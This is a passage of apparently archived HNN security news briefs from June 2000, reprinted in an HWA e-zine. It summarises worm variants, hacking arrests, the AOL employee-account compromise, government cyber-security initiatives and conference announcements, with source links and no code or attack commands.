 147.0 [HNN] June 12'00 Return of FidNet 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Diane 
      The General Services Administration has released a draft request for
      proposals on the Federal Intrusion Detection Network. It is hoped that
      FidNet will enable civilian agencies to react collectively to cyber
      attacks. The draft RFP will allow vendors to determine what they can
      offer now and in the future.
      
      Federal Computer Week
      FedCIRC - RFP
      FidNet
      
      http://www.fcw.com/fcw/articles/2000/0605/web-fidnet-06-08-00.asp
      http://www.fedcirc.gov/fidnet/SECTION%20DRFP.pdf
      http://www.fedcirc.gov/fidnet/
      @HWA
      
      
 148.0 [HNN] June 12'00 H2K Update: Movie Premier, Speaker List 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Macki 
      Freedom Downtime, the 2600 documentary about the Free Kevin campaign
      is nearing completion and will premiere at H2K Friday evening (July
      14). A preliminary list of speakers and panels is now available.
      Preregistration for the conference closes this coming Friday, 6/16/00.
      
      Hope 2000
      
      http://www.h2k.net/
      @HWA
      
      
 149.0 [HNN] June 12'00 Another ILOVEYOU Variant Found 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      Just another copycat of the ILOVEYOU worm it's called Plan Columbia
      (aka Loveletter.AS). Most anti-virus software will detect it as part
      of the ILOVEYOU family and remove it. The subject line will read: US
      PRESIDENT AND FBI SECRETS =PLEASE VISIT = (http://WWW.SHUNSV.COM) = a
      random sequence of 6 uppercase letters.
      
      ZD Net
      
      (http://WWW.SHUNSV.COM)
      http://www.zdnet.com/zdhelp/stories/main/0,5594,2583071,00.html
      @HWA
      
      
 150.0 [HNN] June 12'00 Radio Interferer Gets Five Years 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      Jack Gerritsen has pleaded guilty to charges of broadcasting over
      1,000 obscene messages on police frequencies in the Los Angeles area.
      Mr. Gerritsen has been sentenced to five years in jail for his crimes.
      (The press labeled this guy a hacker. Yeah, it takes a lot of skill
      push a button and say obscene things.)
      
      Associated Press - via Union Tribune
      
      http://www.uniontribune.com/news/state/20000610-991447-radiohacker.html
      @HWA
      
      
 151.0 [HNN] June 12'00 Indonesian Arrested in Australia For Attacking Singapore 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Apocalyse Dow 
      An Indonesian youth has been arrested while studying in Australia for
      breaking into an Singaporean company. A server at Data Storage
      Institute, a Singapore research and development center, was attacked
      in March while the student was studying in Australia. The case was
      handled by the Computer Crime Branch of the police department.
      
      Fairfax IT
      
      http://www.it.fairfax.com.au/breaking/20000612/A61943-2000Jun12.html
      @HWA
      
      
 152.0 [HNN] June 12'00 Evidence to Support Cell Phone Ban Now Available 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by martin 
      About a year ago HNN published a story about a man who was convicted
      in England for using a cell phone on board a plane. HNN felt the law
      was less about public safety and more about airline royalties on in
      flight phone use. Finnally there is some actual scientific evidence
      that illustrates the dangers of cell phone use while in flight. The
      study was conducted by Britain's Civil Aviation Authority, who
      obviously has a vested interested in the outcome of the results. While
      this is definitely a step in the right direction more studies are
      needed.
      
      HNN Archive for July 23, 1999
      New Scientist
      
      http://www.hackernews.com/arch.html?072399
      http://www.newscientist.com/nsplus/insight/phones/dangersignals.html
      @HWA
      

 153.0 [HNN] June 13'00 Hard Drives With Nuke Secrets Disappear 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      The US Energy Department has disclosed that two hard drives containing
      very sensitive nuclear information have come up missing from high
      security vault at the Los Alamos National Laboratory. Officials have
      theorized that the disappearance may be related to last months forest
      fires which caused an evacuation. Officials also commented that it was
      doubtful that espionage was involved. The two hard drives contain
      detailed information on how to disable nuclear weapons in the event of
      an emergency.
      
      C|Net
      MSNBC
      
      http://news.cnet.com/news/0-1003-200-2066575.html?tag
      http://www.msnbc.com/news/419700.asp
      @HWA
      
      
 154.0 [HNN] June 13'00 Police Stumble onto Pirates 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by acopalyse 
      Seeking to recover stolen laptop computers, state troopers in
      Pennsylvania recover much more: $22 million worth of pirated Microsoft
      software and phony license agreements. Police collected more than
      8,000 copies of Windows 98, Microsoft Office and Windows NT at the
      location, and over 25,000 counterfeit end-user license agreements.
      
      Wired
      
      http://www.wired.com/news/business/0,1367,36944,00.html
      @HWA
      
      
 155.0 [HNN] June 13'00 Social Aspects of the Love Bug 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      The recent ILOVEYOU virus/worm was not unique but due to its far
      reaching implications and media coverage it makes an excellent example
      to pick apart antivirus companies, the government's preventive
      measures, cyber detectives, and the guesswork involved in estimating
      billion-dollar damages.
      
      Sun World
      
      http://www.sunworld.com/sunworldonline/swol-06-2000/swol-06-lovebug.ht
      ml
      @HWA
      
      
 156.0 [HNN] June 13'00 Interview with Bruce Schneier 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Rich 
      Noted cryptographer Bruce Schneier answers a few questions for
      Information Security magazine about cryptography, managed security
      services and just security in general.
      
      Infomation Security Magazine
      
      http://www.infosecuritymag.com/jun2000/junqa.htm
      @HWA
      
      
 157.0 [HNN] June 13'00 IC-Crypt 128 Goes Freeware 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Tom 
      Now available as Freeware IC-Crypt offers 128-bit encryption for ICQ
      users. The author has decided to make the reg code generator available
      for all.
      
      IC-Crypt
      
      http://www.ic-crypt.org.uk
      @HWA
      
      
 158.0 [HNN] June 13'00 IronBox Releases New Articles 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by White Vampire 
      Iron Box Technologies, a conglomeration of several high profile
      underground sites, has released several new articles. Sorting and
      Searching Algorithms Part 1 and 2, A Brief History Of Hacking, and A
      Different Language Across the Border which recommends using bilingual
      servers as an addition security measure.
      
      Iron Box Technologies
      
      http://www.ironboxtech.com/articles
      @HWA
      
      
 159.0 [HNN] June 13'00 Hong Kong Government Defaced, Again 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      contributed by acopalyse 
      A vandal or vandals defaced a Hong Kong government Web site Sunday,
      forcing officials to close the site down for the second time in less
      than 24 hours. The government decided to temporarily shut down the
      Interactive Government Services Directory Web site to finally solve
      the problems. The attack on Sunday followed the attack on Saturday
      which forced administrators to take the site off line for 10 hours.
      The police are investigating.
      
      Agence France-Presse - via Nando Times
      
      http://www.nandotimes.com/technology/story/body/0,1634,500214563-50030
      3437-501680312-0,00.html
      @HWA
      


 160.0 [HNN] June 14'00 RootFest Opens Today 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench
      The Midwest's largest computer security convention opens today in St.
      Paul's RiverCentre. RootFest organizers estimate that as many as 1000
      people may attend RootFest this year. It is hoped that the con will be
      broadcast in both audio and video in real time over the net.
      
      RootFest
      Saint Paul Pioneer Press
      
      http://www.rootfest.org/
      http://www.pioneerplanet.com/yhoo/mtc_docs/020426.htm
      @HWA
      
      
 161.0 [HNN] June 14'00 Email Hoax Panics Credit Card Holders 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by root66 
      Customers of Future Shop received an ominous message claiming that
      FutureShop customer records had been compromised and that all credit
      cards numbers had been lost. Fortunately this was not true. FutureShop
      outsources its mass mailings where someone at that unnamed company
      sent the false email. It is unknown if the perpetrator was an employee
      or someone who broke into the other company. Officials are
      investigating. (This really highlights the need of security between
      business partners. It is not enough to wall off your own little
      section of the net if you want to be secure and get work done.)
      
      NW Fusion
      
      http://www.nwfusion.com/news/2000/0612emailhoax.html?nf
      @HWA
      
      
 162.0 [HNN] June 14'00 FAA Fails to Conduct Background Checks on Computer Contractors 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by acopalyse 
      Thousands of outside contractors, many of them foreign nationals, have
      been allowed access to the Federal Aviation Administration's critical
      computer systems without having to undergo background checks. The FAA
      is taking steps to address the gaping security hole, the agency is
      saddled with a backlog of security checks that it doesn't expect to
      complete for several months.
      
      NewsBytes
      
      http://www.newsbytes.com/pubNews/00/150560.html
      @HWA
      
 163.0 [HNN] June 14'00 @stake Announces Technical Advisory Board 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by Space Rogue
      @stake has announced the formation of their Technical Advisory Board.
      which comprises world-renowned leaders in Internet security from the
      private, public and academic spheres, including Counterpane, Intel,
      MIT and UUNet. Strengthening @Stake's already formidable Research and
      Development staff, the members of the Technical Advisory Board
      include: Edward Appel, Ernie Brickell, Dorothy Denning, Tsvi Gal,
      Scott Loftesness, Michael D. O'Dell, Jeffrey I. Schiller, and Bruce
      Schneier.
      
      Business Wire
      
      http://www.businesswire.com/webbox/bw.061300/201650341.htm
      @HWA
      
      
 164.0 [HNN] June 14'00 Site Forced to Hand Over User Identities 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      Financial information Web site Interactive Investor was forced to hand
      over the names and IP addresses of contributors to its bulletin boards
      Sunday after receiving a court order obtained by Scoot.com. Scoot
      alleges the bulletin boards contained defamatory material. Civil
      liberties advocates have warned that the decision to force a Web site
      to reveal the identity of bulletin board contributors could stifle
      Internet free speech in Britain.
      
      ZD Net UK
      
      http://www.zdnet.co.uk/news/2000/23/ns-15965.html
      @HWA
      
      
 165.0 [HNN] June 14'00 ITN Email Compromised 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by no0ne 
      Thousands of people on the ITN Desktop news email distribution list
      received an unauthorized email that said "We are one step closer to
      finding you, you little f***er." Eighteen hours later ITN Sent out an
      email apologizing for the security breech.
      
      The Register UK
      
      http://www.theregister.co.uk/content/1/11324.html
      @HWA
      

 166.0 [HNN] June 15'00 Philippine President Signs Computer Crime Law 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by punkis 
      The ILOVEYOU virus/worm demonstrated the Philippines lack of legal
      remedies for computer crimes. Now the Philippine President has signed
      into law an electronic commerce bill that will hopefully fill this
      gap. The law will punish virus spreaders with a minimum fine of $2,350
      up to a maximum commensurate with the damage caused, and can receive a
      jail sentence of up to three years. The Philippines have now joined
      Malaysia, Singapore and South Korea as countries that have specific
      computer crime laws on the books.
      
      Associated Press - via Boston Globe
      
      http://www.boston.com/dailynews/166/economy/Philippine_president_signs
      _law:.shtml
      @HWA
      
      
 167.0 [HNN] June 15'00 MPAA vs 2600 Transcripts Released 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Macki 
      The court has finally released the recent depositions of MPAA Chief
      Jack Valenti (taken on 6/6), the two-day deposition of MPAA
      Anti-Piracy Chief Kenneth Jacobsen (taken on 5/17 and 5/18), as well
      as the transcripts of last week's hearing on public access to these
      and other depositions (held on 6/6) and the hearing on discovery
      issues (held on 6/8). Future documents and transcripts will posted as
      soon as they become available. Audio and Video transcripts of the
      Valenti deposition will hopefully be posted soon.
      
      2600.com
      
      http://www.2600.com/
      @HWA
      
 168.0 [HNN] June 15'00 Raytheon Unveils SilentRunner 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Evil Wench 
      Defense contractor Raytheon Co. yesterday unveiled "SilentRunner",
      what it calls the vanguard of network monitoring. At $65,000 a pop the
      software is designed to monitor internal network traffic to analyze
      communications patterns to detect when proprietary information is
      leaving the company.
      
      Associated Press - via Nando Times
      
      http://www.techserver.com/noframes/story/0,2294,500216198-500306527-50
      1702299-0,00.html
      @HWA
      
      
 169.0 [HNN] June 15'00 30 year Old Security Report Still Useful 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by maggie d
      A report published by the Rand Corporation in 1970 for the Advanced
      Research Projects Agency was declassified in 1975. The report,
      entitled Security Controls for Computer Systems, details appropriate
      computer security safeguards that would protect classified information
      in multi-access, resource-sharing computer systems. While written in
      1970 and declassified in 1975 this document still has valuable
      comprehensive information regarding networked multi user machines.
      (Even with more and more technology the basic security principals
      still apply. People just keep making the same mistakes.)
      
      Linux Security
      
      http://www.linuxsecurity.com/resource_files/documentation/R609.1.html
      @HWA
      
      
 170.0 [HNN] June 15'00 15 yr old Receives Classified Documents 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Maggie and Apocalyse Dow 
      Claire McDonald, 15, of Devon, England, has been receiving e-mails for
      the past six months that she believed came from the Pentagon in the
      United States. Over 250 emails in all that contain classified
      information where mailed from Royal Navy Commander Jim Dale intended
      for RNC Jamie Hay. Dale, who works in the US at the Pentagon, was
      contacted by the girl when she started receiving the emails. He told
      her to contact her ISP and continued to send the classified
      information.
      
      Fairfax IT
      
      http://www.it.fairfax.com.au/breaking/20000615/A8896-2000Jun15.html
      @HWA
      
      
 171.0 [HNN] June 15'00 Underground Tools 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by rfp
      Network Computing magazine takes a stab at describing some of the more
      popular tools used by the underground.
      
      Network Computing
      
      http://www.nwc.com/1110/1110ws1.html
      @HWA
      
 
 172.0 [HNN] June 16'00 Political Candidates Deface Web Pages 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by Crystal 
      It started when Democratic candidate Maria Cantwell's campaign workers
      linked to a picture of their opponent, Sen. Slade Gorton, R-Wash., in
      a very humorous pose on their web site. The Cantwell camp evidently
      only linked to the photo on the Gorton site. Workers for Sen. Gorton
      then changed the picture to something more flattering. Now Gorton's
      campaign is accusing Cantwell, a dot-com executive, of stealing
      intellectual capital, high-tech hacking and hijacking his server.
      (Linking to a picture is now considered stealing intellectual capital?
      Yeah, I want this guy in office.)
      
      Seattle Times
      
      http://archives.seattletimes.com/cgi-bin/texis/web/vortex/display?slug
      @HWA
      
      
 173.0 [HNN] June 16'00 Mitnick Seeks to Renew Ham License 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Vapor 
      An entry in the June 7, 2000 FCC Enforcement Logs show that Kevin
      Mitnick (N6NHG) & his legal counsel are in the process of renewing his
      General Class Ham radio license. Kevin's attorney, R. Gregory Adlin,
      argues that ham radio operation will not violate his parole
      conditions. FCC Special Counsel for Amateur Radio Enforcement Riley
      Hollingsworth states that Mitnick's current license remains valid
      while he and his lawyer gather documentation to prove that operating
      ham radios will not violate his parole.
      
      ARRL
      
      http://www.arrl.org/news/enforcement_logs/2000/0607.html
      @HWA
      
      
 174.0 [HNN] June 16'00 Value of Microsoft Trash On the Rise 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      contributed by McIntyre 
      Not really sure what to make of this story or what is exactly going on
      but it seems that someone is trying to buy the unshredded trash of the
      Association for Competitive Technology (ACT) which is closely aligned
      with Microsoft. In an unrelated incident Microsoft's Dupont offices
      were broken into earlier this week but nothing was found missing.
      
      Wired
      Wall Street Journal
      
      http://www.wired.com/news/politics/0,1283,37022,00.html
      http://interactive.wsj.com/articles/SB961105810825579561.htm
      @HWA
      
      
 175.0 [HNN] June 16'00  China Sentences Man to Death 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      Fang Yong embezzled about 1.66m yuan (about 200,000 US dollars) of
      public money from the The Bank of Communications of China, by
      counterfeiting bank paper, and transferring money from people's
      accounts from May to August 1990. The 36-year old "hacker" was
      sentenced to death here recently by the Ningbo Intermediate Court in
      East China's Zhejiang Province. This is the most severe punishment
      that a Chinese judicial organization has given to a "cyber criminal".
      (Hacker? Cyber Criminal? Lets try Forger and Embezzler, those words
      are much more descriptive. Oh, but they aren't as sensationalistic,
      sorry.)
      
      BBC - via Lexis-Nexis
      
      http://web.lexis-nexis.com/more/cahners-chicago/11407/5955809/4
      @HWA
      
      
 176.0 [HNN] June 16'00 OpenBSD 2.7 Now Available 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
             
      contributed by White Vampire 
      OpenBSD 2.7 has been released. OpenBSD has gone three years without a
      remote vulnerability in the default installation and two years without
      a localhost vulnerability in the default installation. This is
      arguably the most secure operating system available. And guess what?
      Its free.
      
      Open BSD
      
      http://www.openbsd.org/27.html
      @HWA
      
      
 177.0 [HNN] June 16'00 RootFest Ends Today 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Code Kid
      The last day of RootFest, the largest security convention in the
      Midwest ends today. Live Audio and Video is available.
      
      RootFest
      St. Paul Pioneer Press
      
      http://www.rootfest.org/
      http://www.pioneerplanet.com/yhoo/mtc_docs/027786.htm
      @HWA
      
      
 178.0 [HNN] June 16'00 White Paper: Internet Identity Theft 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      The Software and Information Industry Association, a trade group
      representing more than 1,000 high-tech companies have released a white
      paper that details how consumers can prevent identity theft in cyber
      space. It is hoped that informing the public will help prevent cyber
      fraud, misused card numbers, and improve consumer confidence in
      shopping online.
      
      ZD Net
      Internet Identity Theft: A Tragedy For Victims
      
      http://www.zdnet.com/zdnn/stories/news/0,4586,2588919,00.html
      http://www.siia.net/sharedcontent/divisions/ebus/id_theft.pdf
      @HWA
      
      
 179.0 [HNN] June 16'00 New Ezines 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by syztrix and Cyber0ptix 
      We forgot to mention it earlier but b0g has released its fifth issue.
      Also just released is issue 4 of 0blivion Mag.
      
      B0g
      0blivion
      
      http://www.b0g.org
      http://www.0blivion.org
      @HWA
      
   
 180.0 [HNN] June 19'00 AOL Confirms Compromise 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by mortel 
      America Online confirmed Friday that some of their employee accounts
      have been compromised by attackers, and that the accounts were used to
      gain access to and view details of some personal user accounts. This
      was accomplished via a trojan that was placed on AOL employees
      machines. (This is not the first time AOL had been compromised, its
      just getting more press this time.)
      
      Associated Press - via Yahoo
      Reuters - via Yahoo
      ABC News
      CNN
      ZD Net
      
      Observers UK has posted a few articles that are little bit more
      technical and offer a glimpse inside the setup of the AOL network.
      They talked with Retired who offers a step by step method of accessing
      the internal AOL network.
      
      AOL naps while hackers attack 
      CRIS access: The Mecca of ao-haxors
      
      http://dailynews.yahoo.com/h/ap/20000616/tc/aol_hacked_1.html
      http://dailynews.yahoo.com/h/nm/20000616/wr/aol_hackers_dc_1.html
      http://abcnews.go.com/sections/tech/DailyNews/aol000616.html
      http://www.cnn.com/2000/TECH/computing/06/17/aol.hacker.01/index.html
      http://www.zdnet.com/zdnn/stories/news/0,4586,2589679,00.html
      http://www.observers.net/securecris.html
      http://www.observers.net/crisreply.html
      @HWA
      
      
 181.0 [HNN] June 19'00 College of Dupage Make Unfounded Claims Regarding CyberCop School 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by evenprime 
      After Microsoft and Omni Tech donated software and computers to the
      Suburban Law Enforcement Academy of the College of DuPage in
      Naperville, Illinois, the marketing machines of Omni Tech and the
      academy started making claims that "every class they've ever held,
      they actually catch someone in an act of perpetrating a crime..."
      Lewis Koch of zdnet attempted to verify these claims, but school
      officials would not give him any examples, and the DuPage County
      prosecutor's office couldn't provide any corroborating reports. School
      officials refused to explain this disparity. They also refused to
      discuss the qualifications of the staff to teach computer crime
      courses, the curriculum, or to let Koch view the course.
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/comment/0,5859,2588873,00.html
      @HWA
      
      
 182.0 [HNN] June 19'00 Los Alamos Hard Drives Found 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Dave 
      Two missing computer hard drives containing sensitive nuclear weapons
      data from the Los Alamos National Laboratory have been recovered,
      federal authorities announced Friday. The drives where found behind a
      copy machine that had already been searched once. Officials say they
      will continue to investigate the matter to determine if the data has
      been compromised.
      
      CNN
      Reuters - via C|Net
      
      http://www.cnn.com/2000/ALLPOLITICS/stories/06/16/losalamos.disks/inde
      x.html
      http://news.cnet.com/news/0-1003-200-2093750.html?tag
      @HWA
      
      
 183.0 [HNN] June 19'00 Japanese Exercise CyberCrime Law 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by evenprime 
      Japanese authorities on the northern island of Hokkaido have arrested
      a man they say unlawfully penetrated through the firewall of a Web
      site, the fifth such arrest since a new cyber crime law went into
      effect earlier this year.
      
      ZD Net
      
      http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2589803,00.html?ch
      kpt
      @HWA
      
      
 184.0 [HNN] June 19'00  Anti Pedephile Groups Take on the Net 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by evenprime 
      Antichildporn.org, condemmend.org, and EHAP are all searching for
      pedophiles in an attempt to remove them and their content from the
      net. While some of the methods they use may not be ethical they say
      they are all legal. (Unfortunately there is no way to verify how
      effective these groups are.)
      
      ABC News
      
      http://abcnews.go.com/sections/tech/DailyNews/antiporn000616.html
      @HWA
      
      
 185.0 [HNN] June 19'00 More E-Zines 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by L33t Dawg 
      Issue #6 of Hack In The Box's zine is ready and available. HAO has
      released its premier E-zine, titled (EnLighten2000). The new E-zine
      has a news, windows, mac, linux, and info section. Also HWA.hax0r.news
      has released issued #53.
      
      Hack In the Box
      HAO
      HWA.hax0r.news
      
      http://www.hackinthebox.org
      http://www.hao.org
      http://welcome.to/HWA.hax0r.news/
      @HWA      
      

 186.0 [HNN] June 20'00 Stages Virus Starts to Become Widespread 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Apocalyse Dow 
      Just another copycat trojan/worm is making the rounds of corporations
      in the US, Australia, Asia, and elsewhere. Like ILOVEYOU, the latest
      virus automatically sends copies to everyone listed in the Microsoft
      Outlook program's address book. Both viruses can also spread through
      chat rooms. The new virus uses a Windows feature called Shell Scrap
      Object to activate. The virus carries an ".shs" suffix but Windows
      computers are generally configured to hide the suffix, making the file
      appear to contain only text. The virus appears to be written by Zulu,
      the same person that is believed to have written the Bubbleboy virus
      that appeared last year.
      
      Associated Press - via Canada.com
      ZD Net
      
      VBS_Stages.A - via Trend Micro
      
      http://www.canada.com/cgi-bin/cp.asp?f
      http://www.zdnet.com/zdnn/stories/news/0,4586,2590403,00.html
      http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName
      @HWA
      
      
 187.0 [HNN] June 20'00         Employees Sue Employer For Firing Over NetBus 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by RenderMan 
      About a year ago two gentlemen in New Zealand were evaluating Netbus
      Pro for tech support use, and because of this they were fired by their
      employer. They are now taking their employer to court. With Recent
      changes to the treatment of Netbus, this case should be interesting as
      to establish what truly makes some code malicious. In one of the
      defendant own words he writes about the events that lead up to this
      and Renderman looks at the issue of the power that Anti-Virus
      definitions can wield.
      
      Defendants own words
      RenderMan's summary and background
      
      http://www.antiav.com/NZrant.html
      http://www.antiav.com/NZcase.html
      @HWA
      
      
      
 188.0 [HNN] June 20'00  The Cyberterror Scare of 2000 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
      contributed by Evil Wench 
      So where is the "electronic pearl harbor" that is supposed to cripple
      the US Internet Infrastructure? Last year experts were warning about
      malicious code being hidden as Y2K fixes it is now June and nothing
      has happened. Kevin Poulsen takes a look at these and other questions
      in his latest article.
      
      Security Focus
      
      http://www.securityfocus.com/templates/article.html?id
      @HWA
      
      
 189.0 [HNN] June 20'00   AOL Increases Network Security 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by q bahl 
      AOL has revealed that intruders accessed their system by targeting
      specific employees with Trojan laden email attachments. AOL said that
      about 200 accounts total had been compromised but that they have have
      increased their security level in the wake of the intrusion. AOL has
      said that it will involve law enforcement once its internal
      investigation is completed.
      
      C|Net - via Yahoo
      
      http://dailynews.yahoo.com/h/cn/20000619/tc/aol_boosts_email_security_
      after_attack_1.html
      @HWA
      
      
 190.0 [HNN] June 20'00  Poll Says Americans Are Afraid of CyberCrime 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      A poll released Monday at a conference of technology executives and
      law enforcement officials claims that two thirds of Americans are
      concerned about the threat cybercriminals. The poll was commissioned
      by EDS and the Information Technology Association of America. The poll
      included the responses of 1000 people. (1,000 people speak for the
      entire country?)
      
      Associated Press
      
      http://dailynews.yahoo.com/h/ap/20000619/tc/cybercrime_2.html
      @HWA
      
      
 191.0 [HNN] June 20'00  Cyber Defense Still Looked at As Part of Cold War 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      Sen. Charles Schumer (D-N.Y.) at a recent symposium blamed current
      cyber defense spending on the Cold War mentality. Other officials
      echoed these concerns saying that without an electronic Pearl Harbor
      it was difficult to convince leaders to spend the required moneys.
      
      Federal Computer Week
      
      http://www.fcw.com/fcw/articles/2000/0619/news-dfnse-06-19-00.asp
      @HWA
      
      
 192.0 [HNN] June 20'00  FAA Opens Cyber Security Office 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      Raymond Long hopes to plug the holes in the Federal Aviation
      Administration'9s network that may be at risk of intrusion, both in
      nationally deployed systems and systems unique to each airport. The
      office was officially opened in May and has been headed by Mr. Long
      who was the FAA's Y2K czar.
      
      Federal Computer Week
      
      http://www.fcw.com/fcw/articles/2000/0619/pol-isec-06-19-00.asp
      @HWA
 
 193.0 [HNN] June 21'00 Credit Taken for Stages Worm 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by William Knowles 
      Bruce Hughes, a manager at ICSA.net believes he has identified the
      author of the Stages Worm. 'Zulu' is believed to live in Argentina,
      speaks Spanish and English, and has written several virus/worms
      including Bubbleboy, Monopoly, FreeLinks, and others. The FBI has been
      reported as investigating the case.
      
      Reuters - via Nando Times
      Reuters - via Fox News
      
      http://www.techweb.com/wire/story/reuters/REU20000620S0009
      http://www.foxnews.com/vtech/0620/t_rt_0620_33.sml
      @HWA
      
      
 194.0 [HNN] June 21'00 Drug Office Tracks Web Visitors 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Banner 
      The White House Office of National Drug Control Policy has cookie
      enabled the ad banners that are used in its anti-drug media campaign.
      The banner ad direct users to Freevibe.com a site sponsored by the
      Drug office. The office says that the cookies are just a method of
      tracking its ad campaign and were not meant to track users and that
      the information would not be sold or given to third parties. However
      the ad campaign is being controlled by Doubleclick which has come
      under serious fire collating web surfers information and violating
      users privacy.
      
      Scripps Howard News Service
      
      http://shns.scripps.com/shns/story.cfm?pk
      @HWA
      
      
 195.0 [HNN] June 21'00 NATO Unleashes Offensive Cyberwar Weapon 
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      contributed by Evil Wench 
      NATO scientists at the Kfor peacekeeping force headquarters in
      Pristina, Kosovo created a virus that would secretly email documents
      from victims hard drives. Unfortunately the virus escaped into the
      wild and is being blamed for leaking a nine-page document detailing
      the rules of engagement for NATO-soldiers to the press. The virus is
      called 'Anti-Smyser 1' and is alleged to be a variation of a MS Word
      macro virus known as THUS.Q.
      
      The Times UK
      
      http://www.the-times.co.uk/news/pages/sti/2000/06/18/stinwenws01024.ht
      ml
      @HWA
      
      
 196.0 [HNN] June 21'00 Mexico Hires Hackers To Crack Password 
